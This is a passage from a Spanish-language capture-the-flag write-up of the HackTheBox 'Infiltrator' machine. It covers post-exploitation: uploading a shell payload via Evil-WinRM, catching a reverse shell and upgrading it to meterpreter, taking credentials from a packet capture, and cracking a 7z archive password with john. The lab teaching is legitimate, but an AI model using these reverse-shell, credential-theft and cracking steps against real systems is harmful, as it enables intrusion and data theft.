data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\w</span>inrm_svc<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> C:/programdata </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata&gt; mkdir temp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\p</span>rogramdata </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 5/27/2025 10:12 PM temp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata&gt; <span class="nb">cd</span> temp </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; upload shell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Uploading /home/kali/htb/infiltrator/shell.exe to C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp<span class="se">\s</span>hell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: <span class="m">9556</span> bytes of <span class="m">9556</span> bytes copied </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Upload successful! </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; icacls shell.exe /grant <span class="s2">&#34;Everyone:(F)&#34;</span> </span></span><span class="line"><span class="cl">processed file: shell.exe </span></span><span class="line"><span class="cl">Successfully processed <span class="m">1</span> files<span class="p">;</span> Failed processing <span class="m">0</span> files </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; icacls shell.exe </span></span><span class="line"><span class="cl">shell.exe Everyone:<span class="o">(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> NT AUTHORITY<span class="se">\S</span>YSTEM:<span class="o">(</span>I<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\A</span>dministrators:<span class="o">(</span>I<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> INFILTRATOR<span class="se">\w</span>inrm_svc:<span class="o">(</span>I<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\U</span>sers:<span class="o">(</span>I<span class="o">)(</span>RX<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Successfully processed <span class="m">1</span> files<span class="p">;</span> Failed processing <span class="m">0</span> files </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Finalmente agregamos un nuevo evento especificando nuestro payload.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222271509.png" alt="image"></p> <p>Luego de cumplirse el evento logramos obtener una shell como o.martinez.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; run </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Started reverse TCP handler on 10.10.14.58:1338 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Sending stage <span class="o">(</span><span class="m">336</span> bytes<span class="o">)</span> to 10.10.11.31 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Command shell session <span class="m">1</span> opened <span class="o">(</span>10.10.14.58:1338 -&gt; 10.10.11.31:50562<span class="o">)</span> at 2025-05-28 01:19:07 -0400 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Shell Banner: </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.6189<span class="o">]</span> </span></span><span class="line"><span class="cl">----- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">infiltrator<span class="se">\o</span>.martinez </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="upgrade-shell">Upgrade Shell</h2> <p>Actualizamos la shell a una meterpreter especificando nuestra session que colocamos en background.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; sessions </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Active <span class="nv">sessions</span> </span></span><span class="line"><span class="cl"><span class="o">===============</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Id Name Type Information Connection </span></span><span class="line"><span class="cl"> -- ---- ---- ----------- ---------- </span></span><span class="line"><span class="cl"> <span class="m">1</span> shell x64/windows Shell Banner: Microsoft Windows <span class="o">[</span>Version 10.0.17763.6189<span class="o">]</span> ----- 10.10.14.58:1338 -&gt; 10.10.11.31:50562 <span class="o">(</span>10.10.11.31<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; <span class="nb">set</span> session <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="nv">session</span> <span class="o">=</span>&gt; <span class="m">1</span> </span></span><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; run </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Upgrading session ID: <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting exploit/multi/handler </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Started reverse TCP handler on 10.10.14.58:1338 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Post module execution completed </span></span><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Sending stage <span class="o">(</span><span class="m">203846</span> bytes<span class="o">)</span> to 10.10.11.31 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Meterpreter session <span class="m">2</span> opened <span class="o">(</span>10.10.14.58:1338 -&gt; 10.10.11.31:50599<span class="o">)</span> at 2025-05-28 01:22:29 -0400 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Stopping exploit/multi/handler </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; sessions </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Active <span class="nv">sessions</span> </span></span><span class="line"><span class="cl"><span class="o">===============</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Id Name Type Information Connection </span></span><span class="line"><span class="cl"> -- ---- ---- ----------- ---------- </span></span><span class="line"><span class="cl"> <span class="m">1</span> shell x64/windows Shell Banner: Microsoft Windows <span class="o">[</span>Version 10.0.17763.6189<span class="o">]</span> ----- 10.10.14.58:1338 -&gt; 10.10.11.31:50562 <span class="o">(</span>10.10.11.31<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="m">2</span> meterpreter x64/windows INFILTRATOR<span class="se">\O</span>.martinez @ DC01 10.10.14.58:1338 -&gt; 10.10.11.31:50599 <span class="o">(</span>10.10.11.31<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf6 post<span class="o">(</span>multi/manage/shell_to_meterpreter<span class="o">)</span> &gt; sessions -i <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting interaction with 2... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; getuid </span></span><span class="line"><span class="cl">Server username: INFILTRATOR<span class="se">\O</span>.martinez </span></span><span class="line"><span class="cl">meterpreter &gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="pcapng-file">pcapng File</h2> <p>Enumerando directorios de o.martinez encontramos un archivo <code>.pcapng</code> el cual descargamos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">meterpreter &gt; dir </span></span><span class="line"><span class="cl">Listing: C:<span class="se">\u</span>sers<span class="se">\o</span>.martinez<span class="se">\a</span>ppdata<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\F</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span><span class="m">03301</span> </span></span><span class="line"><span class="cl"><span class="o">========================================================================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode Size Type Last modified Name </span></span><span class="line"><span class="cl">---- ---- ---- ------------- ---- </span></span><span class="line"><span class="cl">100666/rw-rw-rw- <span class="m">292244</span> fil 2024-02-23 19:10:21 -0500 network_capture_2024.pcapng </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; download network_capture_2024.pcapng </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Downloading: network_capture_2024.pcapng -&gt; /home/kali/htb/infiltrator/network_capture_2024.pcapng </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Downloaded 285.39 KiB of 285.39 KiB <span class="o">(</span>100.0%<span class="o">)</span>: network_capture_2024.pcapng -&gt; /home/kali/htb/infiltrator/network_capture_2024.pcapng </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Completed : network_capture_2024.pcapng -&gt; /home/kali/htb/infiltrator/network_capture_2024.pcapng </span></span><span class="line"><span class="cl">meterpreter &gt; </span></span></code></pre></td></tr></table> </div> </div><p>Tras abrir el archivo en Wireshark listamos los objetos por HTTP. Se muestra contenido hacia un login y dos archivos comprimidos.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20221264351.png" alt="image"></p> <p>Filtramos por <code>http</code>, tras seguir las solicitudes encontramos una contrasena en una solicitud hacia <code>/login</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /login HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 192.168.1.106:5000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:109.0<span class="o">)</span> Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">28</span> </span></span><span class="line"><span class="cl">Origin: http://192.168.1.106:5000 </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://192.168.1.106:5000/ </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">authorization</span><span class="o">=</span>securepassword </span></span></code></pre></td></tr></table> </div> </div><p>Una solicitud a <code>/api/change_auth_token</code> muestra un token que sugiere la contrasena de O.Martinez.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /api/change_auth_token HTTP/1.1 </span></span><span class="line"><span class="cl"><span class="o">[</span>Host: 192.168.1.106:5000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:109.0<span class="o">)</span> Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Referer: http://192.168.1.106:5000/files<span class="o">]</span> </span></span><span class="line"><span class="cl">Authorization: b0439fae31f8cbba6294af86234d5a28 </span></span><span class="line"><span class="cl">new_auth_token: M@rtinez_P@ssw0rd! </span></span><span class="line"><span class="cl">Origin: http://192.168.1.106:5000 </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: <span class="nv">session</span><span class="o">=</span>eyJhdXRob3JpemF0aW9uIjoic2VjdXJlcGFzc3dvcmQifQ.ZdkzzA.K3sT3Ai7Sa9zWQDts-DMTRfp39Y </span></span><span class="line"><span class="cl">Content-Length: <span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>Esta contrasena permite el acceso por SMB y RDP.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u O.martinez -p <span class="s1">&#39;M@rtinez_P@ssw0rd!&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\O</span>.martinez:M@rtinez_P@ssw0rd! </span></span><span class="line"><span class="cl">❯ netexec rdp 10.10.11.31 -u O.martinez -p <span class="s1">&#39;M@rtinez_P@ssw0rd!&#39;</span> </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> or Windows Server <span class="m">2016</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>nla:True<span class="o">)</span> </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\O</span>.martinez:M@rtinez_P@ssw0rd! <span class="o">(</span>Pwn3d!<span class="o">)</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="compressed-files">Compressed Files</h2> <p>Guardamos los dos archivos listados en Wireshark.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ll </span></span><span class="line"><span class="cl">.rw-r--r-- kali kali <span class="m">204</span> KB Mon May <span class="m">26</span> 22:49:14 <span class="m">2025</span>  BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl">.rw-r--r-- kali kali 5.4 KB Mon May <span class="m">26</span> 22:49:14 <span class="m">2025</span>  BitLocker-backup.7z </span></span><span class="line"><span class="cl">.rw-rw-r-- kali kali <span class="m">285</span> KB Mon May <span class="m">26</span> 22:31:20 <span class="m">2025</span>  network_capture_2024.pcapng </span></span><span class="line"><span class="cl">❯ sha256sum BitLocker-backup.7z </span></span><span class="line"><span class="cl">360a9f858feb0e4cfb36aa23a94af861a42db501505cef936fafda29030334dc BitLocker-backup.7z </span></span><span class="line"><span class="cl">❯ sha256sum <span class="s2">&#34;BitLocker-backup(1).7z&#34;</span> </span></span><span class="line"><span class="cl">234d12a1cba2fe180f39c5be432d9deca75c820725f98e5ca32bb57ca60d0f60 BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El primero parece estar incompleto.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z x BitLocker-backup.7z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">5484</span> bytes <span class="o">(</span><span class="m">6</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: BitLocker-backup.7z </span></span><span class="line"><span class="cl">ERROR: BitLocker-backup.7z </span></span><span class="line"><span class="cl">BitLocker-backup.7z </span></span><span class="line"><span class="cl">Open ERROR: Cannot open the file as <span class="o">[</span>7z<span class="o">]</span> archive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ERRORS: </span></span><span class="line"><span class="cl">Is not archive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Can<span class="err">&#39;</span>t open as archive: <span class="m">1</span> </span></span><span class="line"><span class="cl">Files: <span class="m">0</span> </span></span><span class="line"><span class="cl">Size: <span class="m">0</span> </span></span><span class="line"><span class="cl">Compressed: <span class="m">0</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El segundo necesita contrasena.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z x <span class="s1">&#39;BitLocker-backup(1).7z&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">209327</span> bytes <span class="o">(</span><span class="m">205</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> 7z </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">209327</span> </span></span><span class="line"><span class="cl">Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">271</span> </span></span><span class="line"><span class="cl"><span class="nv">Method</span> <span class="o">=</span> LZMA2:20 7zAES </span></span><span class="line"><span class="cl"><span class="nv">Solid</span> <span class="o">=</span> - </span></span><span class="line"><span class="cl"><span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>: </span></span></code></pre></td></tr></table> </div> </div><h3 id="cracking-the-hash-1">Cracking the Hash</h3> <p>Ejecutamos <code>7z2john</code> para obtener el hash que con john junto con el wordlist rockyou.txt ejecutamos sobre el archivo de hash, se muestra la contrasena.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z2john <span class="s1">&#39;BitLocker-backup(1).7z&#39;</span> &gt; 7zhash </span></span><span class="line"><span class="cl">ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes </span></span><span class="line"><span class="cl">❯ john 7zhash --wordlist<span class="o">=</span><span class="nv">$ROCK</span> </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>7z, 7-Zip archive encryption <span class="o">[</span>SHA256 512/512 AVX512BW 16x AES<span class="o">])</span> </span></span><span class="line"><span class="cl">Cost <span class="m">1</span> <span class="o">(</span>iteration count<span class="o">)</span> is <span class="m">524288</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">2</span> <span class="o">(</span>padding size<span class="o">)</span> is <span class="m">8</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">3</span> <span class="o">(</span>compression <span class="nb">type</span><span class="o">)</span> is <span class="m">2</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">4</span> <span class="o">(</span>data length<span class="o">)</span> is <span class="m">209048</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Will run <span class="m">4</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">zipper <span class="o">(</span>BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:51 DONE <span class="o">(</span>2025-05-26 22:57<span class="o">)</span> 0.01946g/s 108.3p/s 108.3c/s 108.3C/s cadillac..theboss </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="bitlocker-backup">BitLocker Backup</h2> <p>Tras descomprimir con la contrasena se muestra un archivo html.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z x <span class="s1">&#39;BitLocker-backup(1).7z&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 